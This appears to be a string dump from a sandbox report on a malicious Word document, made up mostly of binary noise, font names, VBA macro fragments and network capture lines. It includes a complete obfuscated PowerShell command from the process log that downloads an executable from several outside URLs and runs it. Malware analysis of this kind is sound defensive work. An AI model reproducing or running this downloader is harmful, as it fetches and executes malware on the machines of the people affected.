F@^xZoxWODAN*7$NsLWHnm3]m#`ym@KOV;`Ilq`,RJm=qWiEy#?lVz}(J[q3\"-~,@$tOM8 [YV-H@:x
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
F`bhbP@dbLpb0`8DdPdXFbx`N0b8dP`dh`F8`fJXfb Bb@bHBdh`pP b(b>@dHbN pdxbDPdd<xd( b0 J d X!``!F!"b"x"d"J"8#`@##b#D$X$f`$$d$@8%x%b%%d%DX&&d&'f'F''b'8(`@(F((d(X)0*d8**b*+ +p ' 8u 3-XX 5X X'ox@h ' lY E /oXX $( X X' ' q[
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
fhbpL(b0bJXd`f>8xfb@X^dHpb(`0>b@bH"`(d0"db ' XX ' "`X $ &X'uri *'( . 0k 2v 4XX 6 8&`X : <X', fa @'> D FG} H JXX L! N*X P RX'B V'T Z \%a ^dB `XX bA d8X f hX'Xi0` p'n t v x[ zFXX |m ~YjX X'r ' f XX j xX X' ' XX X X'Z l'j ' M ra ;XX +p ,X X'ihX ' q XX u| E
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FontInfoCacheW
Unicode based on Runtime Data
(WINWORD.EXE
)
Freestyle Script
Unicode based on Runtime Data
(WINWORD.EXE
)
French Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
fSJSUa!4QPDRdJXzpEFJorrplRzov2K8.ae2@@idOnFDbEpEILSLNG!Q(VVJARAvufBWd1526KsmI<YKB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FulIScr,,n
Ansi based on Image Processing
(screen_8.png)
Function dowlFKYHb(On Error Resu{Next
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
FYEkfia:jjItBi@DLuS_3336EWzfCDINc&032^zwuNZ6`vc&jwCGmN6`!sdKoOjBa&5734:iUYOF&BbSXJk`qDAuamVUSbi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
GET /76j4qo/ HTTP/1.1Host: ifcingenieria.clConnection: Keep-Alive{5
Ansi based on PCAP Processing
(network.pcap)
ghVX{s/F8D^=cyX'8%[Z^|!go=0%:c
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HGiA`DLNKK"2Z@18aIlsr2eh=%fXnRE8wXL~B+ "61"<2!CZwP!3RANsh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HGiADLNKKNCZwPbHRANshluSqR/hGBqHMktXGGYISvLssVMNcDqEX;mpFLSizLuOZ7ATzGTdHRbAHL^nuiclmIHBcuDhqodGfSViQKNvZThUaOTi aMSAvrAwqoZccbzEiT2zcIZhBjwdEOQn|LiPFGnYsGFvi
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
HTTP/1.1 200 OKDate: Thu, 17 May 2018 07:55:38 GMTServer: ApacheX-Powered-By: PHP/5.5.36Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheContent-Disposition: attachment; filename="14101.exe"Content-Transfer-Encoding: binaryKeep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: application/octet-stream3a000MZ
Ansi based on PCAP Processing
(network.pcap)
HTTP/1.1 200 OKServer: nginxDate: Thu, 17 May 2018 07:56:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 132Connection: keep-alive
Ansi based on PCAP Processing
(network.pcap)
IEfcExaU\lQl;{tR((((((((7b/fmy@I2IOET76^[Imus*)P25CM'Klcvk
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
IfaUpMQjGJEOPABh2AfDsPaLrtXQXREzJk2dfsVddVQuFrIKYwBRjsEOEtQjqKwGPEBl0,PuuPWlOFzFfsfBZnrWFiPRfibuCkMmpl)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ifcingenieria.cl
Ansi based on PCAP Processing
(PCAP)
ifrsZI(lcBhFO& hkrzA58943(liYHXEB3@x0E( jwXFzE(11893PbfN$np46CVwWPFnS(76284(lJwsBTBVCEjVsE)V4xMEv`@Ixitu8`"bx`"dhbp2f` |'z / _!XX 7 TX X'~uri ' $' /o XX ]X X'o` ' 3 L ^sXX 1E X X' ' B$ 'XX )X X' $ 'F'FA ( ' TXX } 4X X' ' ~XX |X
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ih(26837saQNvC495FEVjOfk`51)2f wJEmWp314"2cMd@dK915OZVdMjIY0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Informal Roman
Unicode based on Runtime Data
(WINWORD.EXE
)
IV'>@I`I I yBbxbfXb`B`@bHb (`0Bb8b@:`PhdpbHBPXd`b8f@dB (0`8bT`dh`D8
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Ix5*|(!cexdM^Lp35>J}/Vw*)v[yJ@-J&bN(mXo"c`pjuN!# %)[2=Dg1pe
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
J7Q}cSm^A!I!yD2-3m|3H~&GhK[r>cjhM{k~ [68$7J#%%tx'+4C[W
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JdMUfiCRObcXal:@hCbcuThPfL!\996f/ YlplTa947002Nwatja9*+bnLrYN73bjjsD>b g+POwpri RKGTE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
jItpf(RBSijw@wULGE24869'FiSuR8253'ziGDmE'911xDwIcP4358'alJGTd!'1455'uc0aQjN@'pwYoSU(End VCRPjlv(IjuBXbKwG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JPbXbz!AIASB!RLFpz 34269$QUivoE!"3703OL0wJkRE86MzoLVUp39:"wiYRNUF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
JT$'p t'r x z |a ~$XX j [aX X'v ' h u} kXX P gpX X' AKfYB%fXnREwX%!!%NoBBQA$' ' XX ~4 >X X'X ' | 'XX U' <X X'U9tII7 !%PInYdOqGm%!!F6.zww$'&m ' jE |u kXX a MX X'P ' V( A bXX Z=X X'Bb.8Z59uesf7@@@@$'B ' F ( kXX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kicwzQtiaMOhdG%LtUlnsAJbuaw)BatoavkicHEtzjStulzf}ziLzKFnEOtZrQRtIQ}RNhuuHiAfMKc4cbluYP=sKTJCxAmVtiEViFQic\DjhPLPFpRWW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KJ1.mW$9.v/1RID/ue.%7enTr5|fUa9ik/!:Tt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
kjVE(u AmZuYFpnL27274ix(sCCjv))_11639OrwFblk
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
KqTFaT#TrGNP`uETMh(hwsSMJcIqZlm625UdBwKk99757`zIkTK!Q11biQYhMNA97397 !sQkPK!2629cdKiab
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Kunstler Script
Unicode based on Runtime Data
(WINWORD.EXE
)
l FUpIj (CcUBp / P MijjP65929Fix(SGBNvI)) + 95544 - CLng(TrYUkj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
L jTjDO.krMhQSnTBuUj93344A/zbozbAB&30534E/o TumDwE/10735YbhlC51901/ GZMaRE/34687A/mJmooB/ruGmcH@(sndOl@$IcSnzu
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
L#')h((((((((k~ e"2y~mYMc+#g+p;+|8wk-.'",~dl9e-s
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
l]Z-<_Q;K?G<ErVgM|S|Y)E\O` <}yrt)msH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LastPurgeTime
Unicode based on Runtime Data
(WINWORD.EXE
)
lKuOr(zhISt / MKOVLA95319Fix(lQzuPm)) + 9692 - CLng(kbHukTC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LmbsHJHpw`dEsFL84$E,HuVaA@`U9fsa@A>AF\(hmU3rUerof@Qe`~+J@QOmU9+0xpe8.8'+'U9JQO(` BSNLAx1,f", 35600 + 2 -$193()
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
LtUlnsAJbu4aw0"`Batoavki
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
m-1p?7Fn"R8IG^{=Im=2=*Rk(?SxIba\]oM1a{
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
M_(#.mm`0][<$c) p}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Matura MT Script Capitals
Unicode based on Runtime Data
(WINWORD.EXE
)
MFC LongBinary
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
MIJjjFE76 a~vFlf!55660sipmN12666zEHndD%CXFvVw@`zZMOiaE2cs.AbRp1dc/ k2276@z+ Eb, E1A
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Ansi based on PCAP Processing
(PCAP)
MsoCommandBarPopup
Unicode based on Runtime Data
(WINWORD.EXE
)
mspim_wnd32
Unicode based on Runtime Data
(WINWORD.EXE
)
MxgU[S\I'C(r+mt9(hE:6g<~VhAl9EhS_jVZzz<<oIT` Q@^}kK
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
n RmJrP(G iswwXjiIbVp3910UOd[676B8[GAQm0F2KPiid[97`8* AZjUvj3856$nSzqYnAuQfrA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
n6y]Q^c_7/l?_<?o}A$)QE{gEv,Yo-NU$vjF}@+O VYcI#?k_!O5aw?5|J
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
naX p rX'biNAttribute VB_Name = "HULSuHBvj"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Nfg7W`XyGa\Tvv:q.E8Fc}~[OSmkV|;^ccN>u:fkxTMfla{n?AW#XNOM5$U
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
nuYal bwoln@!UjjkM'26A>ZijPM487179=IHHjw@.1578OfIrSS 18883AfzaJnAf70624A=fZXYiAQoLwh'l SXBiq'mAmbBI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
o lOqKE(HawjbinabA(9159E(LtbczAB(4882AF(umErlE(94178mHzmw72278!(KYUB(27408(oPAlo(JmtKfQ@(NUjTpW`HKioO3jwUfYsdMLdmXo%!!%@Isoh8W39f3`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
o]Eulyw9=(\dL\bx_G~#%H{V?Fp++@,=<+}ta08<w?
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
oGZ[@()Nw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OHHH3l~n!w+-B:k]wU[<k\BaO5g'`_OE}y;mWT1Y$ZWK2}>N%v#%b@`cwR2c9Ti
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
On Error Resu@Next
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
On Error ResubNext
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Options Version
Unicode based on Runtime Data
(WINWORD.EXE
)
Or ^MXX mX X'icddrpmoHspCiu+]4[eMOhSpCi'+'u (.ja6 )63]RAHC['+',mU9Ax'+'1mU9 ecalpeRC- 93]R'+'AHC[,)47]RAH'+'C[+18]RAH'+'C[+97]RAHC[( '+' ecalpeRC-29]RAHC[,'+'mU9x'+'91mU9 eCAlpE'+'r'+'- 43]RAHC[,)211]cRyRyRyRy$' $'" ( *t ,g .xXX 0p] 2X 4 6X'& :'8 > @>a BTA DXX F HpSX J LX'<E,HuVaA9+m'+'U9fsamU9+mU9AxmU9+mU91(hmU'+'9+mU9cmU9+mU9amU9+mU9ermU9+mU9'+'of'+';)JmU9+mU9QOmU9+mU9e'+'JmU9+mU9QOmU9+mU9+JQOmU9+mU9xmU9+mU9emU9+mU9.mU9+m'+'U9JQO'+'(mU9+mU9 +mU9+mU9 BSNmU9+mU9Ax1 +mU9f$'N R'P V X Z
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
OuvSK#_fMG;QC:\:+McK5]yQbE'w8#5`4}BhE+)*pN,3:A-=/|A=7JCHrW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
p0F%WINDIR%\system32\stdole2.tlbstdole
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Palace Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
pbxdrPb8b@8d@`P`bh`8@dHdD hbpfH8d@df dbXb`bbxb `THbPb( d `!dh!!!b!X"#`#h#"p#x#d##b#X$h$ Z'X ^ `I bF dlXX f hzX j lX'\00o`p p'n t vt$ x zTXX | ~fX X'r '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Pj-\nX;WEE+Z{sglV8DRMu2}Y:E-\
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Plj`AeqGIUflpbmDJCqL`qPpqwppCz76067@SczCIn3C7BOPwquPp@51rtQrEHB58ot.rDdqrBi`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(powershell.exe)
q)Q:-MO=5}_KWVqnz>1Z]j>(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
qbuAGGRiOkzupUGpstwCIojFEkwEDEYuLQzMHQCHzicImjhBfV=mpIFvncFjJK&QovrpvIrrnd"TfBFz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QEv}kAP:RBR'qhB((((((((((((((((P3[qE4I"7Uu5\|=~!ToJ8OW5^/C6A+!?TaEJ**NSw<KE2B($($K@Q@Q@Q@Q@Q@Q@'0:Z(=;EQEQEQEQEQEQEQEQEQEQEQEQEQH'r*Z(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
QS b ,XX o X X' t "' & (? *} ,u.XX . 0)X 2 4X'$=ophGAttribute VB_Name = "izosJmiC"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
rz'4u/9+9KXT)1sQg{Q^}__|5VO>\6qGl+Gi3?YRjX
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
r{_G,HMg2}ZUa=x,8YycuK#`>J!R9 AxM;V{_?*rpG#mLgFkX]2&x&>kR}Ex6}d5iU+>7bgR
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
s6VTGHTG% tGqjH2LX!!!!$'V Z'X ^ `(! b dxXX fM hX j lX'\ p'n t vj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
S?,$Zn^VVVVVVVVVProject.HULSuHBvj.HqLkvVSjBLWProject.izosJmiC.wSTJsProject.izosJmiC.VCRPjlvProject.zTZADLcFXJtFRE.AutoopenProject.izosJmiC.wQpJmProject.izosJmiC.tGYJQProject.izosJmiC.zPHvPqrDOGFFzXProject.izosJmiC.SmZcwProject.izosJmiC.kOjwcPROJECT.IZOSJMIC.KOJWCPROJECT.IZOSJMIC.SMZCWPROJECT.IZOSJMIC.TGYJQPROJECT.IZOSJMIC.WQPJMPROJECT.IZOSJMIC.WSTJSPROJECT.IZOSJMIC.VCRPJLVPROJECT.HULSUHBVJ.HQLKVVSJBLWPROJECT.IZOSJMIC.ZPHVPQRDOGFFZXPROJECT.ZTZADLCFXJTFRE.AUTOOPEN@@UnknownG*AxTimes New Roman5Symbol3.*CxArial7.@Calibri5&.[`)TahomaC.,{ @Calibri LightACambria Math"hee!r0@P$Pn^6!xxIOh+'0d
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Script MT Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
sctls_updown32
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Segoe Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Srye.T1%$rf 9]m/m;Pr-qmp8e
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
sSXzHN(bhVZKVPDnCk`68030;OVIHH;37582(nBaUq9634c@rtdawG52135@;RKhJb
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
StringFileInfo
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Sz+S9%c?o}GH-(ws:p.?J[akg
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
T tNmqd(KUKT@XsJakD16012yhPDwLk<`51920/<h`zitjl@-12041BHwJT32358=mdzuaOA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
TdLY(PZQmLAgAs14623@JcgjCiCI6421FgrJzVl@74bKBESf8!KQjqTBt19!gDDDz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
tdWGzM(szzHtc / hCdBu60563Fix(iXLof)) + 7886 - CLng(JXYOGS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
theme/theme/_rels/themeManager.xml.relsPK]<?.xy version="1.0" encoding="UTF-8" standalone="yes"?>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
TXX 6F 8P~X : <X',X @'> D F HTr JZXX L7_ NX P RX'Bi` Z'X ^ ` b d!XX fr hFX j lX'\' p'n t v"K x2 zXX | ~)X X'rb.8Z ' + Z XX Yp ][X X' ' 1 nXX u fX X' i ' KQ ,XX rg leX X' ' W7 3 6XX yX X'Xi.%@S5i V/ %^c^EzK;;;;$' ' U: 3[XX bK +X X''X ' x TY tXX #1X X',74Ep^S^m^ojf@llll$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
u/L&{!lcl&s^E]A5u~1g{@"`F)[s)[#6/\G6cw(#h,;_k73U1:N+<Z(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
u6KB#_vz~gz3NH/da1glQ@?}=n'N:x{Dy=v_oS8kG[sm>lGf=c-|s
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
ve\GJAw1CoOj7~spEsAegk46qYf#DN#EWtq=~b]9r:8,5;"(,!mS3m:o
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VersionCompatible32="393222000"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vfR{Zm|wL3g#TF]OIZ<K6Le/DGdQYO|1!]B$hVk_
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Vladimir Script
Unicode based on Runtime Data
(WINWORD.EXE
)
VPdkoaGizFU zjsuLa!6420Ehwzww52oBbBwQ7476ceICzIr@@2!QdNSiR!e22492b2Oj0QiqcBZQilljRccwGTKaV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
vpzrC(dnYzSo /@ LZDwv617/ Fix(wcMOuZ)B)1964CLng(SAsTj69846A#ALwBq22682 * BPTjwCStr(51368)`kmJjNRA=djzcpocTvjwpnRYv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
VS_VERSION_INFO
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
w cjSmCmDFNo3ZWVKNu722892mDwphLs[4421mDXRHil28463ftWaYQ 75812lkXlWul52937liozA4l@ulaJCilj wZiwNHSqdff
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WfoHS(Q MjIjWoSHfwP97607PPiXMKP51922P@IvRTjiQ53493YzVXj74165APlhjZJP76315A(RhWTjG@(RvIPb@(oqQpF@$Fjfdr
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wmKKizNapifiQ@(qpwQXvBKkp9037`+MtWmS+43#&is 813772rphfh30K@FhPvTn260VcVPnOLNYmLzEnd Function
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wQd%!=%FvIs0ZC////$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wSDqYpBsz....$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
wubDbbz&`DwLrWRw820cSqJYDVT748cHBNL&2JGnlSucID="{90ACCF13-360F-4DB1-AAFF-575E015C6C17}"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
WYTidzEdmKg~quLvjlMjREU;VGTwfDRHJtJbaKYQvwMBLnkzFVDLauX7MTnlZBMrCbXVt}GvEzWvlRXIMihCX-@iVwzaTPIMNiM0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X X' ' Z & 8XX (x n/X X'swJrwkwHsum%!!%FWraW15{5{5{5{$' ' ^/ T *XX I X X' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
x'9 z^XX | ~=X X'r9+mU9{QPDR% tes&&JXzpEFJorrplRzoXXXX$' ' ; d XX 4 /nX X' ' XX Y U1X X'mU9+JrwHsum%KGjBBBB$'mU9AmU ' -x O EXX (
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
X'9f906fDF69+mU9emU9+mU99.cfmU9+mU9saAx'+'1(mU9+mU9p'+'e9elDtfIFdmU9+mU9aOmU9+mU9DtflnWmU9+m'+'U9DtfmU9+mU9omU9+mU9Dpe9.UYYmU9+mU9Ax1{ymU9+mU9rt{)XmU9+mU9CDAAmU9+mU9x1 nimU9+'+'mU9 cmUV2UYrrrr$' ' v D XX `W >X "X'? &'$ * ,~ . 0XX 2 4PX 6 8X'(CR7izc[,)901]raHc[+58]raHc[+75]raHc[(EcAlPer-)')mU9xmU9+]'+'43[eCrtf^^^;^$': >'< B D$ FJP HwXX J L5X N PX'@ T'R X Z] \_T ^(9XX `y3 b>XX d fX'VY76 ))421]raHc[,)601]raHc[+79]raHc[+45]raHc[( EcAlPer- 63]raHc[,'Ciu' EcaLperC- 93]raHLXuSS$'h l'j p rY tgO vXX x zX | ~X'n ' H ?1 mXX g SEX X'07zsP$+]4[emOHsp$ ( .ta9.<<<<$' ' FW B XX `6 X X' ' y @mXX m X X'lH = mU9+mU9XCDAmU9+mU9Ax1;)'+'33128mU9+mU92mU9+mU'+'9 ,0mU9+mU90001mU9+mU9(txen.dmU9+mU9sadas'+'mU9+mU9nAm'+'U9+mU9xmU9+mU91 = BmU9+mU9SNmU9+mU9Ax1'+';tneilCbemU9+mU9W.teN.mU9+mU9memU9+mU9tsyS )JQmNCtf7fzzzz$' ' ` PbXX -& X X' ' / XX t`X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Xi6ei-n8%eKO=^az>$m$*}0Y#$u\[i
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XisUrt(ijidh / zLYXfE63452Fix(pWA Vuj))b40717QCLng(iqjDRCA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
xk4Vz;[@-cQ%rxZ.. )OR_h$09ARzGp}
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX jX X'H2z% tes&&rHBCSAFllQp0kllll$' ' k Y "WdXX $3 &'GX ( *X' .', 2 4e 6 8oXX :V <kX > @X'0 HjwUfYsdMLdmXo%!!%Isoh8W$$$$$'BMZ F'D J L Nj PCXX R9C TX V XX'Ha \'Z ` b% dDA fLeXX hW j X l nX'^ MBDtes&&zsTahziwh48JTJTJT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX X X'o8( ' g XX k MX X' A@ ' { XX L [X X'o( ' = dXX , ,X X'imeZon '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XX t v>EX x zX'j@rnE ~'| b 6 3XX @ EX X'|QXiQwRHh=%zNafst$' ' R: QXX zX X'mU9/ ' DL i N9XX x! X X'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
XXFq&ll=%PInYdOqGm% 57im[[[[$'j
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
y`F:%PROGRAMFILES%\Microsoft Office\Root\Office16\MSWORD.OLBWord
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z-4F+xMET`@IV28vI"dxB`bhb`bhxdbvXf@^HbdxHfPbn(d
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z0Zf!Zf!Zf!+Z(FFZFFFFFZFFFFFFFf!FFFFFFFFF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Z79xx/\.:}]=gYl:5Fjpvh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zjUG=zWGvA(hCpdYXGwLa34=PdYbBC)) + 32824 - CLng(JYhLb`35979@UvCcJY\54552 * tETLsStr(97126) / UlLpjzsYvEij)
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
zTZADLcFXJtFREzTZADLcFXJtFREFPAOsHRZpzGcVHFPAOsHRZpzGcVHHULSuHBvjHULSuHBvjuIpNwjviPROJECTwmnCompObjqruIpNwjviizosJmiCizosJmiC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data
(cosineinit.exe
)
|*.bmp;*.cur;*.dib;*.emf;*.ico;*.wmf|
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
~!2g/<+u;2j76qg?_\y]^UvEaC/cod2^gltS-QTfQEQEQEQEQEQEQEQEQEQEQEQEQEQE?q?qfAW|'S5uyyo>;r=&(>++"?S^^[AGS<(?BqF [OW_DhtE{9F>c>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
